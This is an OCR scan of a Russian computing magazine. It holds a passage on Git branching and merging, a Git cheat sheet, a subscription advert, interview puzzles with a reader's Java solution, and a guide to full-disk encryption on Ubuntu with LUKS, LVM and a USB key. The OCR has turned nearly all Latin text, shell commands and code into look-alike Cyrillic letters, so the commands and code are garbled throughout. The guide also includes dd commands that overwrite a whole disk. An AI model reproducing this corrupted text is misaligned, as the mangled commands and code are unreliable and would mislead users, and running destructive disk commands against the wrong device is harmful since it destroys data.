ние нового метода СеНейо\Мопа ито(). После этого я сохранил изменения 
и сделал коммит: 


1Е ааа “"Аб$ЕгасЕ С1аззе$/ВазеСа1си1афог.с$" # Добавляем файл 
$ =1Е сотт1Е -т "ааа беЕНе11о\ог1а5${г1п=()" # Делаем коммит 


Изменения в1е{-Бгапсй зафиксированы, теперь попробуем посмотреть, 
что произошло в ветке таЗег. Для переключения на другую ветку выполни 
уже знакомую команду спескош: 


$ 21 спескоиЕ тазег 


Попробуй открыть модифицированный файл и убедись, что внесенных 
несколькими минутами ранее изменений там нет. Они остались в ветке {ез{- 
бгапсй, и, чтобы к ним вернуться, мы должны опять выполнить переход. 


СЛИВАЕМСЯВЕДИНОМ ПОРЫВЕ 

У нас имеется две ветки, в одной из которых ({е${-Бгапсй) были изменения 
(напомню, я добавил описание нового метода). Будем считать, что эти из- 
менения полностью готовы для отправки в основную ветку, то есть в та$ег. 


Когда мы говорим о ветках СЕ, 

то мы подразумеваем указатель. 
Не копию проекта, а просто указа- 
тель на один из коммитов 
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Локальное хранилище мигрировало в ВИбиске{ 


Для слияния веток применяется команда тегсдбе. 
Попробуем слить ветку {е$1-Бгапсй с та$ег: 


# Переходим на ветку тазфег 

$ вг1Е сНескоиЕ таз%ег 

# Выполняем слияние с веткой фе$%-БгапсИ 
$ ЕЛЕ тмегре {е5*-Бгапси 


Выполнение этих команд будет обязательно 
сопровождаться сообщением «Ра${ огмиага» (на 
сленге говорят «перемотка»). Оно подразумева- 
ет, что удача на нашей стороне и СК удалось объ- 
единить все изменения без лишнего геморроя. 
Успехом мы обязаны нашему коммиту, а точнее, 
его наследственности. Ветка {1е$1-бгапсй сразу 
указывала на коммит, являющийся прямым ро- 
дителем коммита, с которым мы работаем в на- 
стоящее время. 

Хорошо, а что, если удача повернулась к нам 
задом и повторить такой финт не удается? Как СЁ 
поступит в этом случае? Такие ситуации застав- 
ляют Сй попотеть: ему приходится выполнить 
трехходовое слияние на основе двух снимков 
состояния репозитория, на которые ссылаются 
вершины веток и общий слепок-прародитель 
для этих двух веток. 

По окончании этих манипуляций Ой создаст 
новый коммит, который принято называть ком- 
мит-слияния. Свое название он получил из-за 
того, что имеет больше одного предка. Обрати 
внимание, что СЁ и в этом случае берет всю ра- 
боту по организации слияния на себя. Он проа- 
нализирует возможные варианты и остановится 
на лучшем предке. Если слияние выполнилось 
успешно (нетникаких ошибок), то можно не стес- 
няться и удалять ненужную ветку: 


$ =1Е Бгапсп -4 %е${-6гапсй 


На этом слияние можно считать завершен- 
ным, все изменения, сделанные в ветке Те$- 
огапсй, мигрировали в таег. 


РАЗБОР КОНФЛИКТОВ 

Рано или поздно у тебя обязательно возникнет 
ситуация, когда изменения, сделанные в одной 
ветке, наглым образом конфликтуют с изме- 


оно гл = 


Га 


$, Сюпе* «С РОК 2% Сотраге 5 Ри гециев! 
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нениями в другой. Подобные вещи появляют- 
ся, если ты изменишь одну и ту же часть файла 
в разных ветках. 

СИ подобные конфликты ’самостоятель- 
но разрулить не может, так что эта работа 
ложится на твои плечи. Если конфликт воз- 
никнет, то ответом на команду тегаде будет со- 
общение: «СОМЕЦСТ (сотепт): Мегде сопй« т 
ВазеСа!сцатог.с$». Получить список всех про- 
блемных файлов ты всегда можешь при помощи 
команды ой Заи$. В приведенном примере вид- 
но, что конфликт возник в файле ВазеСас\!атог. 
с$. Если открыть этот файл сейчас, то в районе 
конфликтного участка будет что-то вроде: 


<<<<<<< НЕАО:ВазеСа1си1а ог. с$ 
геЕиги 3; 


ТИ =. 
геиги = Т +2; 
>>>>>>> ПоЕйх31337 :ВазеСа1си1а ог. с$ 


В верхней части блока приведен код из ветки 
паег, а в нижней — из по х31337. Реализация 
методов в двух ветках сильно отличается. Кон- 
фликт разрешается путем самостоятельного 
редактирования файла. Например, либо ты про- 
сто удаляешь вариант из ветки та$ег и оставля- 
ешь лишь новую реализацию (ш{1 = 4; гит =1+ 
2;), либо собираешь из двух кусков один. Такую 
операцию необходимо произвести для каждого 
конфликта и по завершении выполнить для них 
дцааа. 


ВМЕСТО ЗАКЛЮЧЕНИЯ 

Переходить или нет на СЁ — дело личное. Да, 
он может показаться сложным и даже неуклю- 
жим, но, поверь, это лишь первое впечатление. 
Достаточно перевести на него пару своих ра- 
бочих проектов и попробовать реально пора- 
ботать с системой несколько дней. Уверен, уже 
через неделю консольные команды не будут так 
страшны, а ты перестанешь лишний раз пере- 
живать при работе с исходным кодом в команде. 
В общем, идею ты понял, и мне остается лишь 
пожелать тебе хороших коммитов и денежных 
проектов. Удачи! 2= 


БОЛЬШАЯ ШПАРГАЛКА 


Первое знакомство с СИ оставляет не- 
однозначное впечатление: куча команд, 
ветки, консоль и другие непонятные 
вещи. Чтобы тебе сразу не запутаться во 
всем этом хозяйстве, я подготовил для 
тебя большую шпаргалку: 
. д\Бгапсй <имя ветки> — создать 
новую ветку; 
ЧН Бгапсй --1$1 — вывести список 
всех созданных веток; 
ан вер <Имя команды> — вывести 
справку по определенной команде; 
ЧН соттй --атепа — сделать по- 
следний коммитеще раз; 
ОН ада <Имя файла|маска> — под- 
готовить файлы (добавить в версион- 
ный контроль); 
ЧН гезе! <Имя файла> — убрать 
файл из индекса; 
ан спескош <имя ветки> — пере- 
ключиться на ветку; 
ЧИ $фати$ — получить текущее со- 
стояние файлов проекта; 
ан сюпе <Источник> — клонировать 
существующий репозиторий; 
ан ай — отобразить список неин- 
дексированных изменений; 
ЧН Аа! --саспеа — вывести список 
изменений, которые войдут в следу- 
ЮЩИЙ КОММИТ; 
ЧН соттй -т <комментарий> — 
сделать коммит (фиксацию измене- 
ний) с произвольным комментарием; 
ЧН тасй <и! или алиас> — полу- 
чить все изменения из репозитория; 
ЧН ри$П <иП или алиас> <ветка> — 
закинуть свои изменения на удален- 
ный сервер в определенную ветку; 
ДН ааа -и — подготовить все изме- 
ненные файлы; 
9Н ши — создать директорию СЁ 
в текущем каталоге; 
ЧН а --З{адеа — сравнить индек- 
сированные файлы с последним 
коммитом; 
ЧЁ гт <Имя файла> — удалить файл 
из индекса; 
ЧИ 109 — показать историю коммитов; 
ан спескош -- <Имя файла> — 
отменить изменения, сделанные 
в файле; 
ЧН гетоте -м — просмотреть список 
соответствия алиасов и ЧРИ: 
ЧН гетоте ада <алиас> <и!> — до- 
бавить сокращение для ЦР; 
9 тад <Имя метки> — добавить 
метку; 
ан тегде <Имя ветки> — слияние с 
веткой; 
ан Ь6гапсй -4 <Имя ветки> — уда- 
лить ветку. 


ПОДПИШИСЬ! 


8-800-200-3-999 
+7 (495) 663-82-77 (бесплатно) 


Редакционная подписка без посредников — это 
гарантия получения важного для Вас журнала 
и экономия до 40% от розничной цены в киоске. 
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6 номеров — 1194 руб. 
12 номеров — 2149 руб. 


6 номеров — 564 руб. 
13 номеров — 1105 руб. 
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_ НЕТВАРЕНЬЯ. 


6 номеров — 1110 руб. 
12 номеров — 1999 руб. 


6 номеров — 599 руб. 


12 номеров — 1188 руб. 


Зномера — 630 руб. 
6 номеров — 1140 руб. 
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6 номеров — 810 руб. 
12 номеров — 1499 руб. 
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6 номеров — 690 руб. 
12 номеров — 1249 руб. 
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6 номеров — 1110 руб. 
12 номеров — 1999 руб. 


И Е 
18 СОНЯ И МАРК УАИТСНОУ: 0 
| ВЕЧНАЯ ЮНОСТЬ — 
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12 номеров — 1499 руб. 
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6 номеров — 775 руб. 
12 номеров — 1399 руб. 
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НОВАЯ ПАРТИЯ ЗАДАЧ 


ЗАДАЧИ ОТКОМПАНИИ $ОЕТЫМЕ 


ЗАДАЧА 1 

Напишите пропущенный текст без использования 
строковых констант. 

у\аг уаг1аб1е = " ги1е7277"; 
ФипсЕ1оп +00(_маг1аб1е ) { 


а1ег*(...); 


} 


оо ("Зауазсг1ре"); 


ма сгЮ Гыетгг 


Рис. 1. Иллюстрация кпервой задаче от Зо те 


ЗАДАЧА 2 

Есть блок с картинкой неопределенной ширины, 
снизу картинки — подпись. В случае, когда под- 
пись короткая, — см. рис. 2. 


Рис. 2 


Если подпись длинная — см. рис. 3. 


Рис. 3 


Как сделать так, чтобы подпись была не боль- 
ше картинки по ширине? Размеры ни блоку, 
ни картинке задавать нельзя. Решение должно 
быть без использования ЧамаЗсири. 


ЗАДАЧАОТ «ЛАБОРАТОРИИ КАСПЕРСКОГО» 


УСЛОВИЕ 

Антивирусному приложению под Апагоа О$ край- 

не важно поддерживать базы в актуальном состо- 

янии. Дан класс са5$ Чражег, реализующий ин- 
терфейс Ниппа фе, функция гип() которого умеет 
проверять наличие обновлений антивирусных баз 
на сервере и скачивать их в случае, если они есть. 

Напишите код, который раз в час будет за- 
пускать функцию гип для объекта класса Чрамег 

и тем самым актуализировать антивирусные базы 

на устройстве. Подсказки: 

1. Задача по обновлению должна стартовать 
строго один раз в час, пропусков из-за того, 
что процессор телефона перешел в спящий 
режим, быть не должно. 

2. При выполнении обновления баз не должно 
возникнуть АМН. 

3. При выполнении обновления баз процессор 
телефона не должен перейти в спящий режим. 


ТРИ ЗАДАЧИ ОТ КОМПАНИИ АВВУУ 


ЗАДАЧА 1 

Дан рюкзак вместимостью С условных единиц, где 
С — целое число. Также дано М предметов. Каж- 
дый 1-й предмет характеризуется двумя числами: 
\ — его размер в условных единицах и Ш — его 
полезность, где \ и Ш — целые числа. Нужно вы- 
брать такое подмножество предметов, чтобы 
суммарный размер выбранных предметов не пре- 
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восходил С и при этом суммарная полезность вы- 
бранных предметов была максимальной. Даны 
числа С, М, \, Ч. Требуется найти вышеописанное 
подмножество предметов. 


ЗАДАЧА 2 
(очень актуальна в свете выхода очередной экра- 
низации Толкина! — Прим. ред.) 

Даны слова на родственных друг другу языках 
квенья и синдарин и их переводы на русский язык 
в перепутанном порядке: 

. уипадап, Бегаа, едат, агат, пипаапть огод, 
аап, Багаа, егап 

. человек запада, башня, люди, короли, человек, 
башни, люди запада, гора (одно из слов на кве- 
нья означает то же самое, что и одно из слов 
на синдарине). 


Установить правильные переводы всех слов. 
Что означает слово огоп на квенья? Назовите 
русское слово, которое одинаково переводится 
и на квенья, и на синдарин. 


ЗАДАЧА З 

Дано натуральное число п (возможно, очень 
большое, для которого используется арифмети- 
ка длинных чисел). Найти максимальное число К, 
квадрат которого меньше п. Требуется написать 
программу, которая работает как можно быстрее 
(желательно еще оценить время работы програм- 
мы). Считаем, что скорость операций над числами 
зависит от длины этих чисел. 


РЕШЕНИЕ ЗАДАЧ ИЗ ПРОШЛОГО НОМЕРА 


ТЕСТЫ ОТ КОМПАНИИ Т-УЗТЕМ$ (СТРАТЕГИЧЕСКОЕ ПОДРАЗДЕЛЕНИЕ ГРУППЫ КОМПАНИЙ ОЕЙТЗСНЕ ТЕГЕКОМ) 


В апрельском номере мы публиковали тест от 
компании Т-Зузет$ (подразделения Вещзспе 
Таекот). Если ты успешно справился с задани- 
ем, компания приглашает тебя на обучение в Тез 
Эспоо! в Санкт-Петербурге. Во время обучения 
выплачивается стипендия, лучших возьмут 


на работу. Учебные группы набираются регулярно 
в течение года. 


Ответы: 
1—6; 3 — а; 5 — 6; Т— в: 9—6: 
2— а; 4— в; 6—6; 8 — а; 10 — в. 
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РЕШЕНИЕ ЗАДАЧИ 
ОТ ЧИТАТЕЛЯ: 


Славим читателя-решателя, 
скрывающегося под ником 
(или это имя и фамилия?) 
Зегоеу позош|, осилившего 
задачу из номера 03 /170/ 2013 


ЗАДАЧА 
Следующий серверный код на уауа осуществляет 
обработку документа, полученного из входящего 
сообщения УМ$, в процессе которой выполняет 
операции с базой данных и отправляет в ответ 
подтверждение. От заказчика появилось тре- 
бование вести в базе данных журнал обработки 
сообщений, в который необходимо записывать 
информацию о результатах обработки. 

Для этого был реализован сервис 1одЗегмсе 
с методом 109(5Зпда те$заде, ТпгомаЫе саизе). 
Измените приведенный код, добавив запись 
в журнал любых результатов обработки и обе- 
спечив корректную обработку ошибок: 


@Тгапзас*1опа1 

риб11с \0о14а ргосе55Воситеп* (Воситепе += 
доситеп*) ЕПгош$ 

5ег\у1сеЕхсер{1оп, Мез5а51пвЕхсер1опт { 


1+ (15\а11а(аоситепт*®)) { 
аоситепЕ5ег\у1се. $®оге (аоситеп*); 
1е5$5а21па5ег\1се. зепд += 
(Аскпом1едветеп*$ .аоситеп{Кесе1уед‹= 
(аосчтеп{*)); 

} е15е { 
те55а21па5$ег\у1се. зепд+- 
(Аскпом1едветеп®$ .аоситеп{Тпуа11а+= 
(аоситепт*)); 


} 


} 


Расскажите: 
как можно протестировать полученный код; 
как должен быть реализован метод аисй, что- 
бы гарантировать запись в журнал любых ре- 
зультатов. 


Следующий серверный 
код на Лауа осущест- 
вляет обработку до- 
кумента, полученного 
из входящего сообще- 
ния ]М$ 


Все сделано правильно, поэтому читатель 
получает приз от компании Си$#$ и приглашение 
на собеседование. 2= 


Задачи на собеседованиях то9 


ВОТКАКОЕ РЕШЕНИЕ ПРЕДЛОЖИЛЧИТАТЕЛЬ: 


риб11с \мо1а ргосе$$5Боситеп* (Воситеп= аоситеп®) ЕИгом$ 5егу1сеЕхсерЕ1оп, <= 
Мез5а1п=Ехсер*1оп { 
{гу { 
// Результат обработки 
Аскпом1е5е аскКпом1еаее; 
1+ (15\/а11а(аоситепт*)) { 
аоситепЕ$егу1 се. зФоге (аоситеп*); 
аскпом1еаге = Аскпом1едветеп*$ .аоситепКесетуеа (аоситеп* ) ; 
} е|5е { 
аскпом1е4ёе = Аскпом1едветептт$ .4оситепТиуа11а4 (аоситеп*); 


} 


те55аре5ег\1се. зепа (аскпом1е4ве); 
1ов5егу1се .1о8("аоситепЕ аопе: " 
} сафсн (ЕхсерЕ1оп е) 
// Логирование ошибок 
1ов5егу1се.10о8 ("еггог", е); 
Югом е; // Обратно возвращаем исключение 


+ аскпом1Теаве. {05$%г1п(), пи11); 


} 


Протестировать можно, установив соответствующие зависимости для используемых серви- 
сов и передав подготовленный объект класса Восите напрямую без УМЗ. 


Мое видение метода ана 


бы 
* @рагат агв5 {Пе соттапа 11пе агвитепт®$ 
ый 
ричб11с Еа{1с уо1А та1п(5$%г1пё[] агР$) { 
// ТОО сое арр]11са1оп 1051с пПеге 
аца1* ("спеск_4ос_1а", 10041, пем ТАца1еТпуоке < Воо1еап, 1опе › () { 
@О\егг1ае 
риб11с Воо1еап 1пуокКе(1оп= обдес®) { 
гефигп 1$\/а114(обес*); 
} 


О НИ 
} 


рчб11с °Жа{1с Воо1еап 1$\/а11а(1опе 4остТа) { 
// ачтту тефвоа 
гефигп доста › 0; 


} 


1пфтегРасе ТАиа1*Тпуоке < Т, К > { 
Т 1иуоке(К обдесе); 


} 
Ра 
Ж 
* @рагат <Т> — тип возвращаемых данных 
* @рагат <К> — тип параметра наблюдаемого вызова 
* @рагат орТа — название операции 
* @рагат сх — параметр вызова 
* @рагат а1 — инвокер метода 
* @гефигп 
Ж 
ы 


руб11с $фаЁ1с < Т, К > Т аица1+ (5$%г1пе орта, К с®х, = 
ТАча1Тпуоке < Т, К > а1) { 
// ачале ги 1те... 
Т гези1* = пи11; 
{гу { 
[о25ег\у1се.10=(орта, пи11); 
ге5и1* = а1.1пуокКе ( с*х); 
[о25егу1се.1о0о=(орта + "- аопе!!" + $Ег1п8.уа1чеО+ (гези1{), пи11); 
} сафсй (Ехсер1оп ее) { 
ГоР5ег\у1се.1о0о8(орТа + "- Та11еа!!", ее); 


гесигп гези1; 
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ШИФРОВАНИЕ ДИСКОВ 
С ПОМОЩЬЮ СВУРТЗЕТУР/ЕОК$ 


Борьба с пиратством набирает новые обороты, правообладатели и гос- 
органы удваивают свои усилия в этом нелегком деле. Полагаю, каждый 
из нас подумывал о том, чтобы защитить личные файлы от посягатель- 
ства со стороны «нежданных гостей», да и просто слишком любозна- ЕО 
тельных лиц. 


эммапКза[о{ @ сКг.сот 
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ВВЕДЕНИЕ 

Шифрование будем производить стандартными средствами 
Убитщи, причем ключ шифрования, как и раздел /бооф, будет 
вынесен на сменный накопитель. Но зачем шифровать корне- 
вой раздел? Ведь можно зашифровать только /Поте? На то 
есть несколько причин. Первая — на основе конфигурационных 
файлов из /@с можно извлечь некоторую информацию, пускай 
даже она не относится к конфиденциальным данным. Вторая 
же — если вдруг содержимым диска заинтересуются, ты всегда 
сможешь сказать, что все так и было и что диск уже был забит 
псевдослучайными данными. Итак, что для этого понадобится? 
е Флешкас МВВ 

е Орипи 12.10 

е Чистый жесткий диск 


В качестве алгоритма шифрования будем использовать 
АЕ$, поскольку он принят как стандарт и криптостовк, а в каче- 
стве средства — сгурзаир/ЦУК$. Чтобы иметь возможность 
добавить свободное место поверх зашифрованного тома, за- 
действуем логические тома (ММ). 


СОЗДАНИЕ ШИФРОВАННОГО ТОМА 
Загрузившись с ИмеСЬ, необходимо подготовить флешку: соз- 
дать на ней второй раздел, где будет размещен /бос{ и ключ 
шифрования. Создавая раздел /Боотс ФС еж? вторым, мы уби- 
ваем двух зайцев — первый раздел будет виден во всех систе- 
мах, и на нем можно хранить данные, а второй из \ММтаом/$ так 
просто не увидишь, что прибавляет неудобства любопытству- 
ющим. Для разбиения я использовал аращес, но тебе никто не 
мешает использовать, например, 1«1$К. 

После этого нужно подмонтировать новосозданный раздел 
и сгенерировать ключевой файл: 


шка1г /тп®/Боое /тпе/Яа$й 

тоцпе /4еу/5а+1 /тпЕ/Яа$И 

тоипЕ /аем/5а+2 /тпе/Боо* 

а 1+=/аеу/гапаот о+=/тп*/Боо{/Кеу.61п 6$=32 <> 
СОЧПЁ=1 


+ + ++ 


Если длина ключевого файла в 32 байта твоей паранойе по- 
кажется недостаточной (моей показалась, хоть я и понимаю, 
что фактически пользовательским ключом шифруется мастер- 
ключ, который занимает те же самые 32 байта), то ты можешь 
использовать следующую команду: 


# 94а 1+=/аеу/гапаот о+=/тпф/Ббоо*/Кеу.Б1п 6$=1 «= 
соипф=512 


Для чего считывать по одному байту? Дело в том, что пул 
случайных чисел в ядре относительно маленький и не всегда 


гос ФиБипЕи-сгуро: - 


777 


Создавая раздел /бооЕ с ФС ехЁ2 вторым, 
мы убиваем двух зайцев — первый раздел 
будет виден во всех системах, а второй из 
Млпадом/$ так просто не увидишь 


РАМСЕВ 


Описываемые здесь 
средства способны 
необратимо уничтожить 
твои данные. Трижды 
проверяй введенные 
команды, прежде чем 
нажимать <Ещег> 


Заголовок шифрован- 
ного тома вчитабель- 
ном виде 


(ИК$ Веадег АпРогпа оп Гог /дем/дАЗК/Бу-ии19/с34е4с91-11а1-4802-88са-9с36е5с99097 


уегатоп: 1 
С1рНег паме: ае5 
САрНег моде: сс - 2551: 5На256 


НазН врес: 5па256 
Рау\оад оРР5ее: 4096 


5: Е 2 а2 37 зе 61 37 23 с0 652 98 51 31 56 аб БВ 89 97 еб 


29 ТВ 49 в: 
94 2е 45 : 
МК 1еегат\оп=: 13875 
ПитТО: сз4е4с91- 


В 3а 9е 9Г ее 28 59 91 65е 
89 сЁ се 15 92 сЁ а3 85 


-9е36е5с99097 


кеу 51оЕ @: ЕНАВЬЕЙ 
[ТегаеТопе: 


39 


ъатЕ: БГ 93 60 58 с5 43 ед еб а 92 тт Бе е6 07 9а ВР 


ЧГ 35 е4 85 а7 са 60 49 41 94 с3 71 
Кеу пабегтат огГ5еЕ: В 
АР 5ЕГгтрес: ы: 
: ОТЪАВЬЕО 
2: ОТЪАВЕЕО 
Е 3: ОТЪАВЕЕО 
: ОТЪАВЕЕО 
з: ОТЪАВЬЕО 
2" ОТЗАВЬЕЙ 
} : ОТЪАВЬЕО 
гос иБипти-сгур№о:-# || 


де 88 ЭР аг 


содержит достаточное количество рандомных данных, поэтому 
во время генерации беспорядочно шевели мышью. 

Далее необходимо заполнить диск псевдослучайными дан- 
ными. Перед выполнением следующей команды рекомендую 
трижды проверить, что диск, который ты заполняешь, именно 
тот, который тебе нужен. 


# аа 1+=/аеу/чгападот о+=/аеу/заа 6$=8М 


Заполнение необходимо, чтобы уменьшить вероятность 
успеха криптоанализа, если он будет производиться. Эта опе- 
рация занимает довольно длительное время, поэтому запасись 
терпением. 

И только теперь уже можно запускать утилиту сгуузаучр. 
Инициализируем диск в формате КЗ: 


# сгурЕ5ефир -П№=$Па256 -с=ае$-сбс-е$$1у:$Па256 += 
-5$=256 ТиК$Рогтае /аем/заа /тпе/Боо*/Кеу.61п 


Разберем, что делает эта команда. Первый ключ указывает 
тип хеш-функции, которая будет использоваться для хеширо- 
вания мастер-ключа. Второй ключ указывает алгоритм и тип 


шифрования. 
На этом я остановлюсь чуть подробнее. Что такое СВС? 
Как известно, АЕЗ — блочный шифр, который оперирует 


блоками по 128, 192 или 256 бит. Но, как правило, шифруют 
гораздо большие объемы информации. И возникает про- 
блема — как шифровать, чтобы не было видно неслучайного 
распределения, из которого криптоаналитик может извлечь 
информацию. Умные люди решили ее таким образом: в первом 
блоке находится М — случайный набор битов. И каждый после- 
дующий блок открытых данных ХОВ’ится с предыдущим блоком 
уже зашифрованных данных. Все вроде хорошо, но в случае 
шифрования дисков такая схема, по понятным причинам, не- 
применима (ты же не будешь ждать каждый раз по 10-20 минут, 
пока система расшифровывает нужный тебе участок?). В ШИК$ 
для решения проблемы произвольного доступа к информации 
применяется ЕЗЗМ — шифруются относительно небольшие 
блоки данных (посекторно), а вектор инициализации генериру- 
ется на основе номера сектора и хеша ключа. Такая схема так- 


СЕТЕВАЯ РАЗБЛОКИРОВКА 
ЗАШИФРОВАННОГО ТОМА 
ЧЕРЕЗ 55Н 


Есть способ разблокировки тома ЦУК$ по сети 

через 5$Н. Кратко опишу, что для этого надо. 

1. Добавить возможность разблокировки с 
использованием ввода пароля. 

2. Установить пакет Бизубох и агорбеаг — что- 
бы можно было разблокировать удаленно. 

3. Скачать скрипт (ар!.соийтапп.ае/агорбеахг), 
разместить его в /е1с</Лпйгатт$-юо1$/Поок$/ 
агорбеаг и поставить ему право на выпол- 
нение. 

4. Настроить сетевые параметры в скрипте. 

5. Обновить ша. 


Теперь в случае чего ты сможешь разблокиро- 
вать том ЦУК$ не только локально, но и по сети. 
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гост @иБупти - сгурто:-# дтзефир таЛе 


--Тагдее сгуре 
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--эПомКеу /деу/таррег/сгурто9\1$К 


О 22824206 сгурЕ аез-сбс-е551\у:5На256 260977с4с761039с9966979ссбе9859452е05е0а2е23461784106094а0с872466 0 8:13 4096 


гос @иБип и -сгур®о :-# И 


же защищает от некоторых криптоатак. В частности, поэтому 
яи использую ЦОК$. 

Подтвердив свои намерения после запуска предыдущей ко- 
манды, создаем отображение 1УК$-устройства: 


# сгурзефир -49=/тпи*/Боо*/Кеу.61п ТчК$Ореп «<= 
/а4ем/заа сгурфоа1$К 


Первый этап подготовки завершен — теперь в каталоге /ае\у/ 
паррег появилось устройство сгуроа!5К, с которым можно об- 
ращаться, как с обычным диском. 


СОЗДАЕМТ1УМ ПОВЕРХ ШИФРОВАННОГО ТОМА 
В принципе, теперь можно на вновь созданный криптодиск ста- 
вить Убиты, но, как я уже писал, чтобы получить возможность 
увеличить место, поверх него лучше создать том ММ, что мы 
и сделаем. 

Проинициализируем физический том и создадим группу 
томов: 


# русгеа*е /4еу/таррег/сгурфоа1$К 
# урсгеафе \5 /аеу/таррег/сгурфоа1$К 


Теперь в этой группе создадим логические тома: 


# 1усгеаее -116 -пзмар \5 
# 1усгеафе -166 -пгоо{ \5 
# 1усгеафе -1 100%ЕВЕЕ -ппоте \2 


Теперь можно форматировать их в файловые системы. 
Ты волен выбирать сам, я же использовал как для корневого 
тома, так и для уд-Поте старую добрую ехМ. — на мой взгляд, мы 
и так слишком накрутили, чтобы использовать более новые ФС: 


# мКзмар /деу/таррег/у- мар 
# мКР5.ехЕ4 /4еу/таррег/м5-гоо{ 
# тКР5.ехЕ4 /деу/таррег/у&-Поте 


Подготовка почти завершена — теперь надо бы записать 
ЦУЮ дисков и разделов, для чего выполни следующую команду: 


# 1$ -1 /аеу/а1$К/Бу-чи1а/ >/тпе/ЯазП/Бу-ии1а. хе 


Нам осталось «всего лишь» установить Убищи на нешифро- 
ванный раздел/диск и перенести ее на шифрованный. 


ПОДГОТОВКАИ ПЕРЕНОСОВОМТО 

Теперь ставим на нешифрованный диск Убити — конфигура- 
цию делай по своему вкусу за исключением размещения /боо{ 
и загрузчика. Их необходимо поместить на флешке, где ты за- 
благовременно создал соответствующий раздел. 

После этого загружаемся с флешки, чтобы проверить, все 
ли встало корректно, устанавливаем с помощью ар-дЕ па- 
кеты №Мт2 и сгуузетир — они удалились автоматически после 
установки Убити — и добавляем/изменяем строчки /&4с/аь. 
Должно получиться нечто подобное (за исключением строчек 
с псевдофайловыми системами, которых, впрочем, в совре- 
менных системах нет): 


[ес/Е5+аЬ 
ЦуТ0=аа7са139-074а-4616-а116-3а42+еаб 7459 ++ 


Теперь можно на вновь созданный крипто- 
диск ставить Офити, но, чтобы получить 
возможность увеличить место, поверх него 


лучше создать том ТУМ 


гооЕ@ФиБупЕу-сгурЕо: — 
гост @иБипфиу -сгурфо:-# РАТЗК -1 /деу/59т 


Диск /дем/$ЗГ: 8296 МБ, 8296333312 байт 

64 головок, 32 секторов/треков, 7912 цилиндров, всего 16203776 секторов 
ИПАЕ$ = секторы оР 1 * 512 = 512 Буфе5 

Размер сектора (логического /физического): 512 байт / 512 байт 

Т/О $12е (тАплмит/орт\та\): 512 Бутез$ / 512 Бутез 


Идентификатор диска: 0х00000000 


блоки 19 Система 
ТЭВ7200 Ь 195 РАТЗ?2 
1902539+ 83 1Апих 


Конец 
15976447 
16181526 


Устр-во Загр Начало 
/Зем/$ 971 2048 
/Че\/5 92 =: 15976448 
гоот@иБуп фи -сгурфо : -# Ы 


5% /Бооф ех{2 аефач1{$ 0 2 

Просмотр мастер- аеу/таррег/у=-гоо* ех{4 еггог$=гетоипт-го 9 1 
ключа /деу/таррег/уё-Поте /поте ехЕ4 4е+ач1%$ 0 1 

Ж /дем/таррег/уё-змар попе мар $5м 0 9 


Разделы нафлешке 
бавлении новых дисков не возникла путаница с их именами. 


Теперь идем в файл /ас/сгурЦаь, он у нас примерно следу- 


ющего содержания: 


сгурфоа1$К ЦЧУТО=с34е4с91-1Фа1-4802-88са-<= 


Раздел /боо{ мы монтируем по ЦУЮ для того, чтобы при до- 


9с3Бе5с99097 /Боот/Кеу.Б1п Тик$, с1рпег=« 


аез-сЬс-е$$1\у: $Па256 


Далее нужно изменить ша. В файл /@асЛпиКгатт$-001$5/ 


поЧ\це$ добавляем строчку: 


ат_сгуре 


Создадим скрипт для того, чтобы лишний раз не монтиро- 


вать флешку: 


[ефс/1п1гат$ -0015$/поок$/сгурфокКеу$ 


. /чзг/<Паге/1п1Егат$ -*001$/Поок-Фипс1о0п$ 


# Создаем каталог в образе 1п1гам+$ 


шка1г ${ОЕЗТОТВ}/ес/сгур®о 


# Копируем ключ и сгурЕ$ефир 


ср /Боо*/Кеу.61п ${ОЕЗТОТК}/е&с/сгур®о 


сору_ехес /$61п/сгур&5ефир /$61п 


ПМЕО 
И собственно скрипт для подключения криптодиска (выпол- 
Помимо низко- няется во время загрузки шйга): 
уровневых средств 
шифрования, в Ипих [ефс/1п1гат$ -001$/5сг1р*$/1оса1-Фор/сгурфокКеу$ 
есть средства а 
уровня файловой тоаргобе -6 ат_сгуре 
системы -— такие как мП11е ! /$61п/сгур&зефир -49=/ефс/сгурфо/Кеу.Б1п «= 
ЕпсР$ 1чкК$Ореп /4еу/91$К/бу-ии19/с34е4с91-1+а1-4802 -+= 


88са-9с36е5с99097 сгурфоа1$К; ао 
еспо "Тгу аба1п..." 


опе 


блокировку тома по паролю. 


команда их не увидит и будет создавать стандартный образ. 
Теперь можно давать команду обновления т!га: 


# ирдафе 1п1%га -и -К а11 -у 


Цикл м/Ийе необходим, если в дальнейшем ты добавишь раз- 


Оба скрипта должны быть выполняемыми, иначе следующая 
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Мы чуть было не забыли про конфиг загрузчика. Имеется 
два пути его правки: один простой, но неправильный — пря- 
мое редактирование файла /боо\{/дгиб/агиб.ста, второй тоже 
простой, но на сей раз верный. Некорректность первого спо- 
соба в том, что при каждом обновлении ядра конфиг переза- 
писывается с использованием скриптов из /&с/дгиб.а/. Мы 
же пойдем другим путем — добавим скрипт, который как раз 
и будет генерировать правильные строчки в реальном грабов- 
ском конфиге. Однако есть одно «но» — при обновлении ядра 
тебе придется либо менять его каждый раз, либо оставаться 
на старом (последнее, на мой взгляд, предпочтительнее — см. 
врезку). Вот так примерно выглядят его строчки: 


/еес/=гиб.4/40_си$фот 

тепиепегу "УБипфи сгурфо" { 
гесога11=1 
1+ [ -п ${Вауе_вгибепу} ]; ЕПеп зауе_епу «= 
гесог+а11; В 
5еф ач1ет=1 
Тито раг*_т$90$ 
Тито ехЕ2 
Ти5тО@ $710 
# ЦИТО берем из заранее записанного файла 
зеагсН --по-Яорру --№$-ии1А --зе{=гоот « 
47са139-074а-4616-а116-3а42+еаб 7459 
# Раздел /Бооф для бгиб считается корневым 
# поэтому пути указываются относительно его 
11пих /\т11пи7-3.5.0-17-вепег1с += 
гоо{=/аеу/таррег/\м5-гооф го 
1п1%Га /1п1%гГ9а.1т8-3.5.0-17-вепег1с 


После редактирования этого файла необходимо изменить 
строчку еще одного файла — /ес/аетаи /одгиь с тем, чтобы при 
загрузке данный пункт меню выбирался по умолчанию. Для это- 
го воспользуемся зеа’ом. 


# се '$/@КУВ_ОЕРАЧЕТ=0/СКВУВ_ОЕРАЧЕТ=+= 
"ИБипфи сгурфо"/=' -1 /ефс/аефач1{/5гиь 


По желанию можно выключить ненужные тебе пункты 
меню. Для этого просто сними право выполнения со всех не- 
нужных скриптов в /@с/дгиб.а/. Теперь можно обновить ос- 
новной конфиг: 


# ирдате-=гиБ 


го иБипЕи-спур6о: = 


[ше] 
с. = 


Ге 
т 


| у: 5Па25б 


С РУ 


=: 


7т.а7 


